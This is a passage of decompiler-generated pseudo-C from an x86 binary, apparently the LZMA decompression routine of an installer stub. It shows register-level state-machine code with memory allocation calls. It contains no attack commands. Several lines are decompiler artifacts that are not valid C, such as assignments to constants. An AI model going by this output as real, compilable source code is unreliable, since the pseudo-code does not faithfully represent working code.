                                                  								__eax = __eax +  *(__ebp - 0x74);
                                                  							}
                                                  							__ecx =  *(__ebp - 8);
                                                  							__ebx = 0;
                                                  							__ebx = 1;
                                                  							__al =  *((intOrPtr*)(__eax + __ecx));
                                                  							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                  							L40:
                                                  							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                  							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                  							__ecx =  *(__ebp - 0x58);
                                                  							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                  							 *(__ebp - 0x48) = __eax;
                                                  							__eax = __eax + 1;
                                                  							__eax = __eax << 8;
                                                  							__eax = __eax + __ebx;
                                                  							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  							__ax =  *__esi;
                                                  							 *(__ebp - 0x54) = __esi;
                                                  							__edx = __ax & 0x0000ffff;
                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  								__cx = __ax;
                                                  								 *(__ebp - 0x40) = 1;
                                                  								__cx = __ax >> 5;
                                                  								__ebx = __ebx + __ebx + 1;
                                                  								 *__esi = __ax;
                                                  							} else {
                                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                  								 *(__ebp - 0x10) = __ecx;
                                                  								0x800 = 0x800 - __edx;
                                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                  								__ebx = __ebx + __ebx;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							 *(__ebp - 0x44) = __ebx;
                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                  								L38:
                                                  								__eax =  *(__ebp - 0x40);
                                                  								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                  									while(1) {
                                                  										if(__ebx >= 0x100) {
                                                  											break;
                                                  										}
                                                  										__eax =  *(__ebp - 0x58);
                                                  										__edx = __ebx + __ebx;
                                                  										__ecx =  *(__ebp - 0x10);
                                                  										__esi = __edx + __eax;
                                                  										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  										__ax =  *__esi;
                                                  										 *(__ebp - 0x54) = __esi;
                                                  										__edi = __ax & 0x0000ffff;
                                                  										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  										if( *(__ebp - 0xc) >= __ecx) {
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  											__cx = __ax;
                                                  											_t169 = __edx + 1; // 0x1
                                                  											__ebx = _t169;
                                                  											__cx = __ax >> 5;
                                                  											 *__esi = __ax;
                                                  										} else {
                                                  											 *(__ebp - 0x10) = __ecx;
                                                  											0x800 = 0x800 - __edi;
                                                  											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  											__ebx = __ebx + __ebx;
                                                  											 *__esi = __cx;
                                                  										}
                                                  										 *(__ebp - 0x44) = __ebx;
                                                  										if( *(__ebp - 0x10) < 0x1000000) {
                                                  											L45:
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xe;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t155 = __ebp - 0x70;
                                                  											 *_t155 =  *(__ebp - 0x70) + 1;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  										}
                                                  									}
                                                  									L53:
                                                  									_t172 = __ebp - 0x34;
                                                  									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                  									L54:
                                                  									__al =  *(__ebp - 0x44);
                                                  									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                  									L55:
                                                  									if( *(__ebp - 0x64) == 0) {
                                                  										 *(__ebp - 0x88) = 0x1a;
                                                  										goto L170;
                                                  									}
                                                  									__ecx =  *(__ebp - 0x68);
                                                  									__al =  *(__ebp - 0x5c);
                                                  									__edx =  *(__ebp - 8);
                                                  									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  									 *( *(__ebp - 0x68)) = __al;
                                                  									__ecx =  *(__ebp - 0x14);
                                                  									 *(__ecx +  *(__ebp - 8)) = __al;
                                                  									__eax = __ecx + 1;
                                                  									__edx = 0;
                                                  									_t191 = __eax %  *(__ebp - 0x74);
                                                  									__eax = __eax /  *(__ebp - 0x74);
                                                  									__edx = _t191;
                                                  									L79:
                                                  									 *(__ebp - 0x14) = __edx;
                                                  									L80:
                                                  									 *(__ebp - 0x88) = 2;
                                                  									goto L1;
                                                  								}
                                                  								if(__ebx >= 0x100) {
                                                  									goto L53;
                                                  								}
                                                  								goto L40;
                                                  							} else {
                                                  								L36:
                                                  								if( *(__ebp - 0x6c) == 0) {
                                                  									 *(__ebp - 0x88) = 0xd;
                                                  									L170:
                                                  									_t568 = 0x22;
                                                  									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                  									_t535 = 0;
                                                  									L172:
                                                  									return _t535;
                                                  								}
                                                  								__ecx =  *(__ebp - 0x70);
                                                  								__eax =  *(__ebp - 0xc);
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  								_t121 = __ebp - 0x70;
                                                  								 *_t121 =  *(__ebp - 0x70) + 1;
                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  								goto L38;
                                                  							}
                                                  						}
                                                  					}
                                                  					L1:
                                                  					_t534 =  *(_t614 - 0x88);
                                                  					if(_t534 > 0x1c) {
                                                  						L171:
                                                  						_t535 = _t534 | 0xffffffff;
                                                  						goto L172;
                                                  					}
                                                  					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                  						case 0:
                                                  							if( *(_t614 - 0x6c) == 0) {
                                                  								goto L170;
                                                  							}
                                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                  							_t534 =  *( *(_t614 - 0x70));
                                                  							if(_t534 > 0xe1) {
                                                  								goto L171;
                                                  							}
                                                  							_t538 = _t534 & 0x000000ff;
                                                  							_push(0x2d);
                                                  							asm("cdq");
                                                  							_pop(_t570);
                                                  							_push(9);
                                                  							_pop(_t571);
                                                  							_t610 = _t538 / _t570;
                                                  							_t540 = _t538 % _t570 & 0x000000ff;
                                                  							asm("cdq");
                                                  							_t605 = _t540 % _t571 & 0x000000ff;
                                                  							 *(_t614 - 0x3c) = _t605;
                                                  							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                  							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                  							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                  							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                  								L10:
                                                  								if(_t613 == 0) {
                                                  									L12:
                                                  									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                  									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                  									goto L15;
                                                  								} else {
                                                  									goto L11;
                                                  								}
                                                  								do {
                                                  									L11:
                                                  									_t613 = _t613 - 1;
                                                  									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                  								} while (_t613 != 0);
                                                  								goto L12;
                                                  							}
                                                  							if( *(_t614 - 4) != 0) {
                                                  								GlobalFree( *(_t614 - 4));
                                                  							}
                                                  							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                  							 *(_t614 - 4) = _t534;
                                                  							if(_t534 == 0) {
                                                  								goto L171;
                                                  							} else {
                                                  								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                  								goto L10;
                                                  							}
                                                  						case 1:
                                                  							L13:
                                                  							__eflags =  *(_t614 - 0x6c);
                                                  							if( *(_t614 - 0x6c) == 0) {
                                                  								 *(_t614 - 0x88) = 1;
                                                  								goto L170;
                                                  							}
                                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                  							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                  							_t45 = _t614 - 0x48;
                                                  							 *_t45 =  *(_t614 - 0x48) + 1;
                                                  							__eflags =  *_t45;
                                                  							L15:
                                                  							if( *(_t614 - 0x48) < 4) {
                                                  								goto L13;
                                                  							}
                                                  							_t546 =  *(_t614 - 0x40);
                                                  							if(_t546 ==  *(_t614 - 0x74)) {
                                                  								L20:
                                                  								 *(_t614 - 0x48) = 5;
                                                  								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                  								goto L23;
                                                  							}
                                                  							 *(_t614 - 0x74) = _t546;
                                                  							if( *(_t614 - 8) != 0) {
                                                  								GlobalFree( *(_t614 - 8));
                                                  							}
                                                  							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                  							 *(_t614 - 8) = _t534;
                                                  							if(_t534 == 0) {
                                                  								goto L171;
                                                  							} else {
                                                  								goto L20;
                                                  							}
                                                  						case 2:
                                                  							L24:
                                                  							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                  							 *(_t614 - 0x84) = 6;
                                                  							 *(_t614 - 0x4c) = _t553;
                                                  							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                  							goto L132;
                                                  						case 3:
                                                  							L21:
                                                  							__eflags =  *(_t614 - 0x6c);
                                                  							if( *(_t614 - 0x6c) == 0) {
                                                  								 *(_t614 - 0x88) = 3;
                                                  								goto L170;
                                                  							}
                                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                  							_t67 = _t614 - 0x70;
                                                  							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                  							__eflags =  *_t67;
                                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                  							L23:
                                                  							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                  							if( *(_t614 - 0x48) != 0) {
                                                  								goto L21;
                                                  							}
                                                  							goto L24;
                                                  						case 4:
                                                  							goto L133;
                                                  						case 5:
                                                  							goto L137;
                                                  						case 6:
                                                  							goto L0;
                                                  						case 7:
                                                  							__eflags =  *(__ebp - 0x40) - 1;
                                                  							if( *(__ebp - 0x40) != 1) {
                                                  								__eax =  *(__ebp - 0x24);
                                                  								 *(__ebp - 0x80) = 0x16;
                                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  								__eax =  *(__ebp - 0x28);
                                                  								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  								__eax =  *(__ebp - 0x2c);
                                                  								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  								__eax = 0;
                                                  								__eflags =  *(__ebp - 0x38) - 7;
                                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  								__al = __al & 0x000000fd;
                                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                                  								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                  								__eax =  *(__ebp - 4);
                                                  								__eax =  *(__ebp - 4) + 0x664;
                                                  								__eflags = __eax;
                                                  								 *(__ebp - 0x58) = __eax;
                                                  								goto L68;
                                                  							}
                                                  							__eax =  *(__ebp - 4);
                                                  							__ecx =  *(__ebp - 0x38);
                                                  							 *(__ebp - 0x84) = 8;
                                                  							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                  							goto L132;
                                                  						case 8:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__eax =  *(__ebp - 4);
                                                  								__ecx =  *(__ebp - 0x38);
                                                  								 *(__ebp - 0x84) = 0xa;
                                                  								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                  							} else {
                                                  								__eax =  *(__ebp - 0x38);
                                                  								__ecx =  *(__ebp - 4);
                                                  								__eax =  *(__ebp - 0x38) + 0xf;
                                                  								 *(__ebp - 0x84) = 9;
                                                  								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                  								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                  							}
                                                  							goto L132;
                                                  						case 9:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								goto L89;
                                                  							}
                                                  							__eflags =  *(__ebp - 0x60);
                                                  							if( *(__ebp - 0x60) == 0) {
                                                  								goto L171;
                                                  							}
                                                  							__eax = 0;
                                                  							__eflags =  *(__ebp - 0x38) - 7;
                                                  							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                  							__eflags = _t258;
                                                  							0 | _t258 = _t258 + _t258 + 9;
                                                  							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                  							goto L75;
                                                  						case 0xa:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__eax =  *(__ebp - 4);
                                                  								__ecx =  *(__ebp - 0x38);
                                                  								 *(__ebp - 0x84) = 0xb;
                                                  								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                  								goto L132;
                                                  							}
                                                  							__eax =  *(__ebp - 0x28);
                                                  							goto L88;
                                                  						case 0xb:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__ecx =  *(__ebp - 0x24);
                                                  								__eax =  *(__ebp - 0x20);
                                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  							} else {
                                                  								__eax =  *(__ebp - 0x24);
                                                  							}
                                                  							__ecx =  *(__ebp - 0x28);
                                                  							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  							L88:
                                                  							__ecx =  *(__ebp - 0x2c);
                                                  							 *(__ebp - 0x2c) = __eax;
                                                  							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  							L89:
                                                  							__eax =  *(__ebp - 4);
                                                  							 *(__ebp - 0x80) = 0x15;
                                                  							__eax =  *(__ebp - 4) + 0xa68;
                                                  							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                  							goto L68;
                                                  						case 0xc:
                                                  							L99:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0xc;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t334 = __ebp - 0x70;
                                                  							 *_t334 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t334;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							__eax =  *(__ebp - 0x2c);
                                                  							goto L101;
                                                  						case 0xd:
                                                  							goto L36;
                                                  						case 0xe:
                                                  							goto L45;
                                                  						case 0xf:
                                                  							goto L57;
                                                  						case 0x10:
                                                  							L109:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0x10;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t365 = __ebp - 0x70;
                                                  							 *_t365 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t365;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							goto L111;
                                                  						case 0x11:
                                                  							L68:
                                                  							__esi =  *(__ebp - 0x58);
                                                  							 *(__ebp - 0x84) = 0x12;
                                                  							goto L132;
                                                  						case 0x12:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								__eax =  *(__ebp - 0x58);
                                                  								 *(__ebp - 0x84) = 0x13;
                                                  								__esi =  *(__ebp - 0x58) + 2;
                                                  								goto L132;
                                                  							}
                                                  							__eax =  *(__ebp - 0x4c);
                                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                  							__ecx =  *(__ebp - 0x58);
                                                  							__eax =  *(__ebp - 0x4c) << 4;
                                                  							__eflags = __eax;
                                                  							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                  							goto L130;
                                                  						case 0x13:
                                                  							__eflags =  *(__ebp - 0x40);
                                                  							if( *(__ebp - 0x40) != 0) {
                                                  								_t469 = __ebp - 0x58;
                                                  								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                  								__eflags =  *_t469;
                                                  								 *(__ebp - 0x30) = 0x10;
                                                  								 *(__ebp - 0x40) = 8;
                                                  								L144:
                                                  								 *(__ebp - 0x7c) = 0x14;
                                                  								goto L145;
                                                  							}
                                                  							__eax =  *(__ebp - 0x4c);
                                                  							__ecx =  *(__ebp - 0x58);
                                                  							__eax =  *(__ebp - 0x4c) << 4;
                                                  							 *(__ebp - 0x30) = 8;
                                                  							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                  							L130:
                                                  							 *(__ebp - 0x58) = __eax;
                                                  							 *(__ebp - 0x40) = 3;
                                                  							goto L144;
                                                  						case 0x14:
                                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                  							__eax =  *(__ebp - 0x80);
                                                  							goto L140;
                                                  						case 0x15:
                                                  							__eax = 0;
                                                  							__eflags =  *(__ebp - 0x38) - 7;
                                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  							__al = __al & 0x000000fd;
                                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                                  							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                  							goto L120;
                                                  						case 0x16:
                                                  							__eax =  *(__ebp - 0x30);
                                                  							__eflags = __eax - 4;
                                                  							if(__eax >= 4) {
                                                  								_push(3);
                                                  								_pop(__eax);
                                                  							}
                                                  							__ecx =  *(__ebp - 4);
                                                  							 *(__ebp - 0x40) = 6;
                                                  							__eax = __eax << 7;
                                                  							 *(__ebp - 0x7c) = 0x19;
                                                  							 *(__ebp - 0x58) = __eax;
                                                  							goto L145;
                                                  						case 0x17:
                                                  							L145:
                                                  							__eax =  *(__ebp - 0x40);
                                                  							 *(__ebp - 0x50) = 1;
                                                  							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                  							goto L149;
                                                  						case 0x18:
                                                  							L146:
                                                  							__eflags =  *(__ebp - 0x6c);
                                                  							if( *(__ebp - 0x6c) == 0) {
                                                  								 *(__ebp - 0x88) = 0x18;
                                                  								goto L170;
                                                  							}
                                                  							__ecx =  *(__ebp - 0x70);
                                                  							__eax =  *(__ebp - 0xc);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							_t484 = __ebp - 0x70;
                                                  							 *_t484 =  *(__ebp - 0x70) + 1;
                                                  							__eflags =  *_t484;
                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  							L148:
                                                  							_t487 = __ebp - 0x48;
                                                  							 *_t487 =  *(__ebp - 0x48) - 1;
                                                  							__eflags =  *_t487;
                                                  							L149:
                                                  							__eflags =  *(__ebp - 0x48);
                                                  							if( *(__ebp - 0x48) <= 0) {
                                                  								__ecx =  *(__ebp - 0x40);
                                                  								__ebx =  *(__ebp - 0x50);
                                                  								0 = 1;
                                                  								__eax = 1 << __cl;
                                                  								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                  								__eax =  *(__ebp - 0x7c);
                                                  								 *(__ebp - 0x44) = __ebx;
                                                  								goto L140;
                                                  							}
                                                  							__eax =  *(__ebp - 0x50);
                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  							__eax =  *(__ebp - 0x58);
                                                  							__esi = __edx + __eax;
                                                  							 *(__ebp - 0x54) = __esi;
                                                  							__ax =  *__esi;
                                                  							__edi = __ax & 0x0000ffff;
                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  								__cx = __ax;
                                                  								__cx = __ax >> 5;
                                                  								__eax = __eax - __ecx;
                                                  								__edx = __edx + 1;
                                                  								__eflags = __edx;
                                                  								 *__esi = __ax;
                                                  								 *(__ebp - 0x50) = __edx;
                                                  							} else {
                                                  								 *(__ebp - 0x10) = __ecx;
                                                  								0x800 = 0x800 - __edi;
                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  								 *__esi = __cx;
                                                  							}
                                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                  								goto L148;
                                                  							} else {
                                                  								goto L146;
                                                  							}
                                                  						case 0x19:
                                                  							__eflags = __ebx - 4;
                                                  							if(__ebx < 4) {
                                                  								 *(__ebp - 0x2c) = __ebx;
                                                  								L119:
                                                  								_t393 = __ebp - 0x2c;
                                                  								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                  								__eflags =  *_t393;
                                                  								L120:
                                                  								__eax =  *(__ebp - 0x2c);
                                                  								__eflags = __eax;
                                                  								if(__eax == 0) {
                                                  									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                  									goto L170;
                                                  								}
                                                  								__eflags = __eax -  *(__ebp - 0x60);
                                                  								if(__eax >  *(__ebp - 0x60)) {
                                                  									goto L171;
                                                  								}
                                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                  								__eax =  *(__ebp - 0x30);
                                                  								_t400 = __ebp - 0x60;
                                                  								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                  								__eflags =  *_t400;
                                                  								goto L123;
                                                  							}
                                                  							__ecx = __ebx;
                                                  							__eax = __ebx;
                                                  							__ecx = __ebx >> 1;
                                                  							__eax = __ebx & 0x00000001;
                                                  							__ecx = (__ebx >> 1) - 1;
                                                  							__al = __al | 0x00000002;
                                                  							__eax = (__ebx & 0x00000001) << __cl;
                                                  							__eflags = __ebx - 0xe;
                                                  							 *(__ebp - 0x2c) = __eax;
                                                  							if(__ebx >= 0xe) {
                                                  								__ebx = 0;
                                                  								 *(__ebp - 0x48) = __ecx;
                                                  								L102:
                                                  								__eflags =  *(__ebp - 0x48);
                                                  								if( *(__ebp - 0x48) <= 0) {
                                                  									__eax = __eax + __ebx;
                                                  									 *(__ebp - 0x40) = 4;
                                                  									 *(__ebp - 0x2c) = __eax;
                                                  									__eax =  *(__ebp - 4);
                                                  									__eax =  *(__ebp - 4) + 0x644;
                                                  									__eflags = __eax;
                                                  									L108:
                                                  									__ebx = 0;
                                                  									 *(__ebp - 0x58) = __eax;
                                                  									 *(__ebp - 0x50) = 1;
                                                  									 *(__ebp - 0x44) = 0;
                                                  									 *(__ebp - 0x48) = 0;
                                                  									L112:
                                                  									__eax =  *(__ebp - 0x40);
                                                  									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                  										_t391 = __ebp - 0x2c;
                                                  										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                  										__eflags =  *_t391;
                                                  										goto L119;
                                                  									}
                                                  									__eax =  *(__ebp - 0x50);
                                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  									__eax =  *(__ebp - 0x58);
                                                  									__esi = __edi + __eax;
                                                  									 *(__ebp - 0x54) = __esi;
                                                  									__ax =  *__esi;
                                                  									__ecx = __ax & 0x0000ffff;
                                                  									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                  									__eflags =  *(__ebp - 0xc) - __edx;
                                                  									if( *(__ebp - 0xc) >= __edx) {
                                                  										__ecx = 0;
                                                  										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                  										__ecx = 1;
                                                  										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                  										__ebx = 1;
                                                  										__ecx =  *(__ebp - 0x48);
                                                  										__ebx = 1 << __cl;
                                                  										__ecx = 1 << __cl;
                                                  										__ebx =  *(__ebp - 0x44);
                                                  										__ebx =  *(__ebp - 0x44) | __ecx;
                                                  										__cx = __ax;
                                                  										__cx = __ax >> 5;
                                                  										__eax = __eax - __ecx;
                                                  										__edi = __edi + 1;
                                                  										__eflags = __edi;
                                                  										 *(__ebp - 0x44) = __ebx;
                                                  										 *__esi = __ax;
                                                  										 *(__ebp - 0x50) = __edi;
                                                  									} else {
                                                  										 *(__ebp - 0x10) = __edx;
                                                  										0x800 = 0x800 - __ecx;
                                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                  										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  										 *__esi = __dx;
                                                  									}
                                                  									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  									if( *(__ebp - 0x10) >= 0x1000000) {
                                                  										L111:
                                                  										_t368 = __ebp - 0x48;
                                                  										 *_t368 =  *(__ebp - 0x48) + 1;
                                                  										__eflags =  *_t368;
                                                  										goto L112;
                                                  									} else {
                                                  										goto L109;
                                                  									}
                                                  								}
                                                  								__ecx =  *(__ebp - 0xc);
                                                  								__ebx = __ebx + __ebx;
                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                  								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  								 *(__ebp - 0x44) = __ebx;
                                                  								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                  									__ecx =  *(__ebp - 0x10);
                                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  									__ebx = __ebx | 0x00000001;
                                                  									__eflags = __ebx;
                                                  									 *(__ebp - 0x44) = __ebx;
                                                  								}
                                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                                  									L101:
                                                  									_t338 = __ebp - 0x48;
                                                  									 *_t338 =  *(__ebp - 0x48) - 1;
                                                  									__eflags =  *_t338;
                                                  									goto L102;
                                                  								} else {
                                                  									goto L99;
                                                  								}
                                                  							}
                                                  							__edx =  *(__ebp - 4);
                                                  							__eax = __eax - __ebx;
                                                  							 *(__ebp - 0x40) = __ecx;
                                                  							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
